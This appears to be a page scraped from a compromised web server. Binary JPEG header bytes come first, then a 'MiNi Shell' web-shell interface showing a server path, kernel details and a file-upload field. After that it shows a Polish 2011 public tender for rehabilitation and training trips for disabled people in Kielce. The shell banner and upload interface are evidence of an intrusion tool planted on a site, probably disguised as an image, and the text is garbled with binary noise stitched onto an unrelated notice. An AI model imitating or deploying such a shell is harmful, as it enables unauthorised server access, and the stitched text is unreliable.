JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110510/106192-N-2011.html

<p class="kh_header"><b>Kielce: Kompleksowa usługa aktywizacyjna w formie trzech czternastodniowych wyjazdów  szkoleniowych z elementami aktywizacji społecznej i zdrowotnej dla beneficjentów projektu pn. Równi lecz różni.</b><br>
<b>Numer ogłoszenia: 106192 - 2011; data zamieszczenia: 10.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , Al.   IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 041 342 15 97, faks 041 344 37 49.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.powiat.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa usługa aktywizacyjna w formie trzech czternastodniowych wyjazdów  szkoleniowych z elementami aktywizacji społecznej i zdrowotnej dla beneficjentów projektu pn. Równi lecz różni..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Uczestnikami wyjazdów są beneficjenci uczestniczący w projekcie systemowym Powiatowego Centrum Pomocy Rodzinie w Kielcach pn. Równi lecz różni, - realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.

Pierwszy wyjazd 

Przedmiotem zamówienia jest kompleksowa usługa aktywizacyjna z elementami aktywizacji edukacyjnej, społecznej oraz zdrowotnej dla 20 osób niepełnosprawnych - dysfunkcje zróżnicowane: narządów ruchu, choroby neurologiczne, choroby narządu wzroku, itp., oraz zapewnienie pobytu dla 3 opiekunów osób niepełnosprawnych, obejmująca:

1.	Instrument aktywizacji edukacyjnej: szkolenie komputerowe w co najmniej dwóch grupach, obejmujące tematykę z zakresu podstaw obsługi komputera, pracy w programach Word, Excel oraz podstawowych informacji związanych z poruszaniem się w sieci internetowej (bezpieczna praca w systemie, najpopularniejsze portale internetowe, zakładanie i obsługa konta e-mail) w wymiarze min. 30 godzin lekcyjnych dla każdej grupy.
2.	Instrument aktywizacji zdrowotnej: zorganizowanie i przeprowadzenie 2 badań lekarskich: pierwsze celem wskazania zabiegów rehabilitacyjnych na początku pobytu oraz drugie celem kontroli efektywności zabiegów rehabilitacyjnych dla 20 uczestników. Indywidualna rehabilitacja stosownie do zaleceń lekarza obejmująca oprócz rehabilitacji (ćwiczenia na siłowni, masaże itp.) elementy relaksacji (ćwiczenia oddechowe, relaksacyjne itp.). Nie mniej niż 3 zabiegi dziennie dla każdego uczestnika. 
3.	Instrument aktywizacji społecznej: 
a)	zorganizowanie zajęć pn. Zaakceptuj siebie obejmujących:
	zajęcia z psychologiem dotyczące akceptacji samego siebie, pozbycia się kompleksów, zwiększenia poczucia własnej wartości - 3 godziny
	spotkanie z wizażystą - 3 godziny
	zajęcia taneczne, nauka układu tanecznego - 3 godziny
	zorganizowanie profesjonalnej sesji zdjęciowej dla uczestników wyjazdu                   i wręczenie pamiątkowych zdjęć dla każdego beneficjenta
b)	zorganizowanie 2 wieczorków integracyjnych: 
	pierwszy obejmujący zapoznanie się uczestników wyjazdu z lokalną tradycją                        i kulturą  - zorganizowanie ogniska, przyśpiewki, kuchnia regionalna itp., 
	drugi - wyjście uczestników wyjazdu do kina/teatru (seans dopasowany do potrzeb grupy)
c)	 zorganizowanie jednodniowej wycieczki autokarowej - zwiedzanie okolicznych atrakcji turystycznych.

4. Usługa będzie odbywała się w nadmorskiej miejscowości uzdrowiskowej w Polsce.
5. Zorganizowanie transportu zbiorowego dla 20 uczestników projektu oraz 3 opiekunów osób niepełnosprawnych z miejscowości Kielce do miejsca realizacji kompleksowej usługi aktywizacyjnej oraz z powrotem.
6. Zorganizowanie zakwaterowania dla 20 uczestników projektu  oraz 3 opiekunów osób niepełnosprawnych  w trakcie realizacji ww usług w ośrodku rehabilitacyjno-wypoczynkowym w  pokojach dwuosobowych lub trzyosobowych o podwyższonym standardzie z pełnym węzłem sanitarnym, z TV kablową i czajnikiem bezprzewodowym, w budynku dostosowanym do potrzeb osób niepełnosprawnych w tym na wózkach inwalidzkich. Sala szkoleniowa musi być dostosowana do osób na wózkach inwalidzkich. 
7. Zorganizowanie pełnego wyżywienia dla 20 uczestników  oraz 3 opiekunów osób niepełnosprawnych w trakcie realizacji ww usługi w stołówce mieszczącej się na terenie ośrodka. Zapewnienie cateringu podczas zajęć (kawa, herbata, napoje, ciastka).
Termin wyjazdu -  pomiędzy 20 czerwca  - 15 lipca 2011r.   
Wyjazd obejmuje 14 dni pobytowych.

Drugi wyjazd 

Przedmiotem zamówienia jest kompleksowa usługa aktywizacyjna z elementami aktywizacji edukacyjnej, społecznej oraz zdrowotnej dla 15 osób niepełnosprawnych - dysfunkcje zróżnicowane: narządów ruchu (w tym 1 osoba na wózku inwalidzkim), choroby neurologiczne, choroby narządu wzroku, itp., oraz zapewnienie pobytu dla 3 opiekunów osób niepełnosprawnych, obejmująca:
1.	Instrument aktywizacji edukacyjnej: zorganizowanie i przeprowadzenie szkolenia Moja firma - moja szansa dla 15 osób niepełnosprawnych obejmującego tematykę z zakresu zakładania i prowadzenia własnej działalności gospodarczej oraz pozyskiwania dotacji finansowej na uruchomienie działalności w wymiarze min. 30 godzin lekcyjnych.
2.	Instrument aktywizacji zdrowotnej: zorganizowanie i przeprowadzenie 2 badań lekarskich: pierwsze celem wskazania zabiegów rehabilitacyjnych na początku pobytu oraz drugie celem kontroli efektywności zabiegów rehabilitacyjnych dla 15 uczestników. Indywidualna rehabilitacja stosownie do zaleceń lekarza obejmująca oprócz rehabilitacji (ćwiczenia na siłowni, masaże itp.) elementy relaksacji (ćwiczenia oddechowe, relaksacyjne itp.). Nie mniej niż 3 zabiegi dziennie dla każdego uczestnika. 
3.	Instrument aktywizacji społecznej: 
a)	zorganizowanie zajęć pn. Poczuj się bezpiecznie obejmujących:
	spotkanie z funkcjonariuszem policji dotyczące potencjalnych sytuacji zagrażających życiu i zdrowiu - 3 godziny
	zajęcia ruchowe obejmujące podstawy samoobrony - 4 godziny
b)	zorganizowanie 2 wieczorków integracyjnych:
	pierwszy obejmujący zapoznanie się uczestników wyjazdu z lokalną tradycją i kulturą  - zorganizowanie ogniska, przyśpiewki, kuchnia regionalna itp., 
	drugi - wyjście uczestników wyjazdu do kina/teatru (seans dopasowany do potrzeb grupy)
c)	zorganizowanie jednodniowej wycieczki autokarowej - zwiedzanie okolicznych atrakcji turystycznych.
4. Usługa będzie odbywała się w nadmorskiej miejscowości uzdrowiskowej w Polsce.
5. Zorganizowanie transportu zbiorowego dla 15 uczestników projektu oraz 3 opiekunów osób niepełnosprawnych z miejscowości Kielce do miejsca realizacji kompleksowej usługi aktywizacyjnej oraz z powrotem.
6. Zorganizowanie zakwaterowania dla 15 uczestników projektu  oraz 3 opiekunów osób niepełnosprawnych  w trakcie realizacji w/w usług w ośrodku rehabilitacyjno-wypoczynkowym w  pokojach dwuosobowych lub trzyosobowych o podwyższonym standardzie z pełnym węzłem sanitarnym, z TV kablową i czajnikiem bezprzewodowym, w budynku dostosowanym do potrzeb osób niepełnosprawnych w tym na wózkach inwalidzkich. Sala szkoleniowa musi być dostosowana do osób na wózkach inwalidzkich.
7. Zorganizowanie pełnego wyżywienia dla 15 uczestników  oraz 3 opiekunów osób niepełnosprawnych w trakcie realizacji w/w usługi w stołówce mieszczącej się na terenie ośrodka. Zapewnienie cateringu podczas zajęć (kawa, herbata, napoje, ciastka).
Termin wyjazdu -  II połowa lipca -I połowa sierpnia 2011r.
Wyjazd obejmuje 14 dni pobytowych.

Trzeci wyjazd 

Przedmiotem zamówienia jest kompleksowa usługa aktywizacyjna z elementami aktywizacji edukacyjnej, społecznej oraz zdrowotnej dla 15 osób niepełnosprawnych - dysfunkcje zróżnicowane: narządów ruchu (w tym 1 osoba na wózku inwalidzkim), choroby neurologiczne, choroby narządu wzroku, itp., oraz zapewnienie pobytu dla 3 opiekunów osób niepełnosprawnych, obejmująca:
1.	Instrument aktywizacji edukacyjno-społecznej: 
a)	zorganizowanie i przeprowadzenie  szkolenia aktywizacyjno-motywacyjnego dla 15 osób niepełnosprawnych obejmującego tematykę z zakresu zasad efektywnej komunikacji interpersonalnej, asertywności, zwiększenie osobistej odporności na działania czynników stresujących oraz automotywacji w wymiarze min. 30 godzin lekcyjnych.
b)	zorganizowanie zajęć pn. Żyj zdrowo obejmujących:
	spotkanie z dietetykiem dotyczące zdrowego sposobu odżywiania, łączenia produktów, odpowiedniego przygotowywania posiłków - 3 godziny
	zajęcia z estetyki nakrywania stołu, dekoracja stołu i potraw - 3 godziny
2.	Instrument aktywizacji zdrowotnej: zorganizowanie i przeprowadzenie 2 badań lekarskich: pierwsze celem wskazania zabiegów rehabilitacyjnych na początku pobytu oraz drugie celem kontroli efektywności zabiegów rehabilitacyjnych dla 15 uczestników. Indywidualna rehabilitacja stosownie do zaleceń lekarza obejmująca oprócz rehabilitacji (ćwiczenia na siłowni, masaże itp.) elementy relaksacji (ćwiczenia oddechowe, relaksacyjne itp.). Nie mniej niż 3 zabiegi dziennie dla każdego uczestnika. 
3.	Instrument aktywizacji edukacyjnej: 
a)	zorganizowanie spotkań z zakresu edukacji zdrowotnej w dwóch grupach: 
	pogadanka dla grupy kobiet na temat profilaktyki zdrowotnej w chorobach kobiecych -  rak piersi, rak szyjki macicy, nauka samobadania piersi itp.
	pogadanka dla grupy mężczyzn na temat profilaktyki zdrowotnej - rak prostaty.
Spotkanie w wymiarze 3 godzin lekcyjnych dla każdej z grup.
4.	 Instrument aktywizacji społecznej:
a)	zorganizowanie 2 wieczorków integracyjnych:
	pierwszy obejmujący zapoznanie się uczestników wyjazdu z lokalną tradycją i kulturą  - zorganizowanie ogniska, przyśpiewki, kuchnia regionalna itp., 
	drugi - wyjście uczestników wyjazdu do kina/teatru (seans dopasowany do potrzeb grupy)
b)	 zorganizowanie jednodniowej wycieczki autokarowej - zwiedzanie okolicznych atrakcji turystycznych.

5. Usługa będzie odbywała się w nadmorskiej miejscowości uzdrowiskowej w  Polsce.
6. Zorganizowanie transportu zbiorowego dla 15 uczestników projektu oraz 3 opiekunów osób niepełnosprawnych z miejscowości Kielce do miejsca realizacji kompleksowej usługi aktywizacyjnej oraz z powrotem.
7. Zorganizowanie zakwaterowania dla 15 uczestników projektu  oraz 3 opiekunów osób niepełnosprawnych  w trakcie realizacji ww usług w ośrodku rehabilitacyjno-wypoczynkowym w  pokojach dwuosobowych lub trzyosobowych o podwyższonym standardzie z pełnym węzłem sanitarnym, z TV kablową i czajnikiem bezprzewodowym, w budynku dostosowanym do potrzeb osób niepełnosprawnych w tym na wózkach inwalidzkich. Sala szkoleniowa musi być dostosowana do osób na wózkach inwalidzkich.
8. Zorganizowanie pełnego wyżywienia dla 15 uczestników  oraz 3 opiekunów osób niepełnosprawnych w trakcie realizacji w/w usługi w stołówce mieszczącej się na terenie ośrodka. Zapewnienie cateringu podczas zajęć (kawa, herbata, napoje, ciastka).
Termin wyjazdu - miesiąc wrzesień 2011r.
Wyjazd obejmuje 14 dni pobytowych.

Warunki dodatkowe dotyczące wszystkich wyjazdów:
1. Wykonawca zapewni bezpłatną całodobową opiekę medyczną stosownie do potrzeb uczestników turnusu.
2. Wykonawca zapewni kierownika grupy, który będzie prowadził stały nadzór nad grupą oraz będzie organizował czas wolny uczestnikom wyjazdu.  Kierownik grupy zapewnia opiekę organizacyjną od momentu wyjazdu grupy z Kielc do momentu powrotu grupy do Kielc. Oprócz kierownika grupy Wykonawca zapewni jednego opiekuna do dyspozycji całej grupy.
3. Wykonawca ubezpieczy wszystkich uczestników wyjazdu (osoby niepełnosprawne                               i opiekunowie) od następstw nieszczęśliwych wypadków na kwotę 10 000 zł na jedną osobę                   w czasie 14 dniowego pobytu oraz przejazdu w obie strony.
4. Wykonawca poniesie koszty opłaty uzdrowiskowej/klimatycznej za wszystkich uczestników wyjazdu oraz opiekunów osób niepełnosprawnych, jeśli wymagać będzie tego lokalizacja ośrodka.
5. Wykonawca zapewni uczestnikom usługi możliwość bezpłatnego korzystania z pralni. 
6. Wykonawca w trakcie realizacji zamówienia dokona rezerwacji pokoju i zapewni wyżywienie
nieodpłatnie na 3 doby dla 3 pracowników kontrolujących przebieg realizacji zamówienia.
7. Wykonawca/podwykonawca powinien posiadać wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy, zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. Nr 69 poz. 415 ze zm.) 
8. Zamawiający zastrzega sobie prawo do zmniejszenia ilości osób (uczestnik/opiekun)                          w przypadku rezygnacji uczestnika. Wykonawca nie może z tego tytułu żądać zapłaty oraz dochodzić odszkodowania.
9. Wykonawca zapewni uczestnikom projektu wszelkie niezbędne materiały szkoleniowo-dydaktyczne potrzebne do przeprowadzenia zajęć aktywizacyjnych oraz sprzęt, materiały i narzędzia niezbędne do prowadzenia zajęć. Jeden egzemplarz materiałów szkoleniowo - dydaktycznych wykonawca przekaże zamawiającemu. 
10. Wykonawcę zobowiązuje się do: 
- informowania uczestników usługi o współfinansowaniu projektu ze środków Unii Europejskiej,
- oznakowania miejsca odbywania się usługi oraz wszystkich materiałów związanych                             z przeprowadzeniem usługi w szczególności dokumentów dotyczących przebiegu realizacji zadania, materiałów szkoleniowych, wydawanych dyplomów /certyfikatów lub innych zaświadczeń zgodne z aktualnymi wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki poprzez umieszczenie odpowiednich logotypów wraz z informacją                                    o współfinansowaniu:
Kompleksowa usługa aktywizacyjna w ramach realizacji projektu pn. Równi lecz różni jest współfinansowana ze środków Unii Europejskiej, w ramach Europejskiego Funduszu Społecznego.
11. Wykonawca w trakcie realizacji zamówienia będzie prowadził kronikę w formie nagrań lub
fotografii cyfrowej.
12. Czas trwania dziennych zajęć nie może przekraczać 5 godzin lekcyjnych. 
13. Wykonawca zapewni realizację usługi w ośrodku rehabilitacyjno - wypoczynkowym. 
14. Zabiegi rehabilitacyjne stosownie do dysfunkcji uczestników po uwzględnieniu wskazań lekarza muszą być dostępne na terenie ośrodka. 
15. Wykonawca uwzględni rodzaj diety wynikającej z uwarunkowań jednostki chorobowej
uczestnika zajęć aktywizacyjnych.
16. Wykonawca uwzględni możliwość biernego uczestnictwa w szkoleniach opiekunów osób niepełnosprawnych, którzy wyrażą chęć uczestniczenia w szkoleniach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 85.31.25.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zostanie spełniony, jeśli Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed
upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym
okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wraz z załączeniem dokumentów poświadczających, że te usługi zostały wykonane należycie, co najmniej dwie usługi polegające na zorganizowaniu kompleksowej usługi aktywizacyjnej w formie  czternastodniowego wyjazdu  szkoleniowego z elementami aktywizacji społecznej i zdrowotnej, każda usługa dla co najmniej 20 osób.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty
Program zajęć aktywizacyjnych dla każdego wyjazdu oddzielnie - załącznik nr 6. 
Pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik. Jeśli Wykonawca przewiduje udział podwykonawców w realizacji zamówienia do oferty należy załączyć oświadczenie informujące o części zamówienia , której realizacja zostanie powierzona 
    podwykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
